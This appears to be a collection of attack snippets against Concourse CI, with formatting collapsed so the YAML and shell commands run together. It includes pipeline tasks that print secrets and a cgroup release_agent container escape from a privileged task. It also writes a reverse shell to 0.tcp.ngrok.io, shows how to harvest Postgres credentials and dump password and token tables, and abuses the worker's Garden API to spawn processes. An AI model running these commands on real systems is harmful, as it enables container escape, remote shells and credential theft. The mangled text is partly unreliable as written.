jobs:- name:simpleplan:- task:simple-taskprivileged:trueconfig:# Tells Concourse which type of worker this task should run onplatform:linuximage_resource:type:registry-imagesource:repository:busybox# images are pulled from docker hub by defaultrun:path:shargs:- -cx- |echo "$SUPER_SECRET"sleep 1000params:SUPER_SECRET:((super.secret))
# For more task_config options check https://concourse-ci.org/tasks.htmlplatform:linuximage_resource:type:registry-imagesource:repository:ubunturun:path:shargs:- -cx- |envsleep 1000params:SUPER_SECRET:((super.secret))
# Mounts the RDMA cgroup controller and create a child cgroup# If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist"# It's because your setup doesn't have the memory cgroup controller, try change memory to rdma to fix itmkdir/tmp/cgrp&&mount-tcgroup-omemorycgroup/tmp/cgrp&&mkdir/tmp/cgrp/x# Enables cgroup notifications on release of the "x" cgroupecho1>/tmp/cgrp/x/notify_on_release# CHANGE ME# The host path will look like the following, but you need to change it:host_path="/mnt/vda1/hostpath-provisioner/default/concourse-work-dir-concourse-release-worker-0/overlays/ae7df0ca-0b38-4c45-73e2-a9388dcb2028/rootfs"
## The initial path "/mnt/vda1" is probably the same, but you can check it using the mount command:#/dev/vda1 on /scratch type ext4 (rw,relatime)#/dev/vda1 on /tmp/build/e55deab7 type ext4 (rw,relatime)#/dev/vda1 on /etc/hosts type ext4 (rw,relatime)#/dev/vda1 on /etc/resolv.conf type ext4 (rw,relatime)## Then next part I think is constant "hostpath-provisioner/default/"## For the next part "concourse-work-dir-concourse-release-worker-0" you need to know how it's constructed# "concourse-work-dir" is constant# "concourse-release" is the consourse prefix of the current concourse env (you need to find it from the API)# "worker-0" is the name of the worker the container is running in (will be usually that one or incrementing the number)
## The final part "overlays/bbedb419-c4b2-40c9-67db-41977298d4b3/rootfs" is kind of constant# running `mount | grep "on / " | grep -Eo "workdir=([^,]+)"` you will see something like:# workdir=/concourse-work-dir/overlays/work/ae7df0ca-0b38-4c45-73e2-a9388dcb2028# the UID is the part we are looking for# Then the host_path is:#host_path="/mnt/<device>/hostpath-provisioner/default/concourse-work-dir-<concourse_prefix>-worker-<num>/overlays/<UID>/rootfs"
# Sets release_agent to /path/payloadecho"$host_path/cmd">/tmp/cgrp/release_agent#====================================#Reverse shellecho'#!/bin/bash'>/cmdecho"bash -i >& /dev/tcp/0.tcp.ngrok.io/14966 0>&1">>/cmdchmoda+x/cmd#====================================# Get outputecho'#!/bin/sh'>/cmdecho"ps aux > $host_path/output">>/cmdchmoda+x/cmd#====================================# Executes the attack by spawning a process that immediately ends inside the "x" child cgroupsh-c"echo \$\$ > /tmp/cgrp/x/cgroup.procs"# Reads the outputcat/output
mkdir/tmp/cgrp&&mount-tcgroup-omemorycgroup/tmp/cgrp&&mkdir/tmp/cgrp/x# Enables cgroup notifications on release of the "x" cgroupecho1>/tmp/cgrp/x/notify_on_releasehost_path=`sed-n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab|head-n1`echo"$host_path/cmd">/tmp/cgrp/release_agent#====================================#Reverse shellecho'#!/bin/bash'>/cmdecho"bash -i >& /dev/tcp/0.tcp.ngrok.io/14966 0>&1">>/cmdchmoda+x/cmd#====================================# Get outputecho'#!/bin/sh'>/cmdecho"ps aux > $host_path/output">>/cmdchmoda+x/cmd#====================================# Executes the attack by spawning a process that immediately ends inside the "x" child cgroupsh-c"echo \$\$ > /tmp/cgrp/x/cgroup.procs"# Reads the outputcat/output
env|grep-ipostgCONCOURSE_RELEASE_POSTGRESQL_PORT_5432_TCP_ADDR=10.107.191.238CONCOURSE_RELEASE_POSTGRESQL_PORT_5432_TCP_PORT=5432CONCOURSE_RELEASE_POSTGRESQL_SERVICE_PORT_TCP_POSTGRESQL=5432CONCOURSE_POSTGRES_USER=concourseCONCOURSE_POSTGRES_DATABASE=concourseCONCOURSE_POSTGRES_PASSWORD=concourse[...]# Access the postgresql dbpsql-h10.107.191.238-Uconcourse-dconcourseselect * from password; #Find hashed passwordsselect * from access_tokens;select*fromauth_code;select*fromclient;select*fromrefresh_token;select*fromteams; #Change the permissions of the users in the teamsselect * from users;
# Get current containercurl127.0.0.1:7777/containers{"Handles":["ac793559-7f53-4efc-6591-0171a0391e53","c6cae8fc-47ed-4eab-6b2e-f3bbe8880690"]}# Get container infocurl127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/infocurl127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/properties# Execute a new process inside a container## In this case "sleep 20000" will be executed in the container with handler ac793559-7f53-4efc-6591-0171a0391e53wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \
--header='Content-Type:application/json'\'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'# OR instead of doing all of that, you could just get into the ns of the process of the privileged containernsenter--target76011--mount--uts--ipc--net--pid--sh
curl-XPOSThttp://127.0.0.1:7777/containers \-H 'Content-Type: application/json' \-d '{"handle":"123ae8fc-47ed-4eab-6b2e-123458880690","rootfs":"raw:///concourse-work-dir/volumes/live/ec172ffd-31b8-419c-4ab6-89504de17196/volume","image":{},"bind_mounts":[{"src_path":"/concourse-work-dir/volumes/live/9f367605-c9f0-405b-7756-9c113eba11f1/volume","dst_path":"/scratch","mode":1}],"properties":{"user":""},"env":["BUILD_ID=28","BUILD_NAME=24","BUILD_TEAM_ID=1","BUILD_TEAM_NAME=main","ATC_EXTERNAL_URL=http://127.0.0.1:8080"],"limits":{"bandwidth_limits":{},"cpu_limits":{},"disk_limits":{},"memory_limits":{},"pid_limits":{}}}'
# Wget will be stucked there as long as the process is being executedwget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \
--header='Content-Type:application/json'\'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'